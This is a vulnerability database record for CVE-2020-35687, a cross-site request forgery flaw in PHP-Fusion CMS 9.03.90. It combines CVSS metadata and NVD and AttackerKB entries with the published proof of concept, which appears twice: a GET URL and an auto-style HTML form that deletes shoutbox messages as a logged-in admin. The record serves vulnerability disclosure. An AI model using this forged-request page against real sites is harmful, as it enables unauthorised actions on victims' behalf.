PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)

2021-01-15T00:00:00

Description

{"id": "EDB-ID:49426", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)", "description": "", "published": "2021-01-15T00:00:00", "modified": "2021-01-15T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://www.exploit-db.com/exploits/49426", "reporter": "Mohamed Oosman", "references": [], "cvelist": ["2020-35687", "CVE-2020-35687"], "immutableFields": [], "lastseen": "2022-05-13T17:40:38", "viewCount": 299, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48"]}, {"type": "cve", "idList": ["CVE-2020-35687"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160956"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48"]}, {"type": "cve", "idList": ["CVE-2020-35687"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160956"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/49426", "sourceData": "# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)\r\n# Date: 2020-12-21\r\n# Exploit Author: Mohamed Oosman B S\r\n# Vendor Homepage: https://www.php-fusion.co.uk/\r\n# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php\r\n# Version: 9.03.90 and below\r\n# Tested on: Windows 10\r\n# CVE : CVE-2020-35687\r\n\r\n1. Description:\r\nPHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim.\r\n\r\n2. Proof of Concept\r\nAs the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly,\r\nafter getting to know the shout_id of the message, as it is sequential.\r\n\r\n<html>\r\n<body>\r\n<script>history.pushState('', '', '/')</script>\r\n<form action=\"https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php\">\r\n<input type=\"hidden\" name=\"s_action\" value=\"delete\" />\r\n<input type=\"hidden\" name=\"shout_id\" value=\"3\" />\r\n<input type=\"submit\" value=\"Submit request\" />\r\n</form>\r\n</body>\r\n</html>", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"packetstorm": [{"lastseen": "2021-01-15T17:31:32", "description": "", "published": "2021-01-15T00:00:00", "type": "packetstorm", "title": "PHP-Fusion 9.03.90 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-35687"], "modified": "2021-01-15T00:00:00", "id": "PACKETSTORM:160956", "href": "https://packetstormsecurity.com/files/160956/PHP-Fusion-9.03.90-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) \n# Date: 2020-12-21 \n# Exploit Author: Mohamed Oosman B S \n# Vendor Homepage: https://www.php-fusion.co.uk/ \n# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php \n# Version: 9.03.90 and below \n# Tested on: Windows 10 \n# CVE : CVE-2020-35687 \n \n1. Description: \nPHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. \n \n2. Proof of Concept \nAs the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, \nafter getting to know the shout_id of the message, as it is sequential. \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php\"> \n<input type=\"hidden\" name=\"s_action\" value=\"delete\" /> \n<input type=\"hidden\" name=\"shout_id\" value=\"3\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160956/phpfusion90390-xsrf.txt"}], "cve": [{"lastseen": "2022-03-23T17:58:20", "description": "PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-01-13T17:15:00", "type": "cve", "title": "CVE-2020-35687", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35687"], "modified": "2021-02-02T17:51:00", "cpe": ["cpe:/a:php-fusion:phpfusion:9.03.90"], "id": "CVE-2020-35687", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35687", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php-fusion:phpfusion:9.03.90:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-10-22T07:43:07", "description": "PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.\n\n \n**Recent assessments:** \n \n**oosman-rak** at January 20, 2021 4:08am UTC reported:\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-01-13T00:00:00", "type": "attackerkb", "title": "CVE-2020-35687", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35687"], "modified": "2021-01-16T00:00:00", "id": "AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48", "href": "https://attackerkb.com/topics/A36Twlwhjn/cve-2020-35687", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)

Description

Related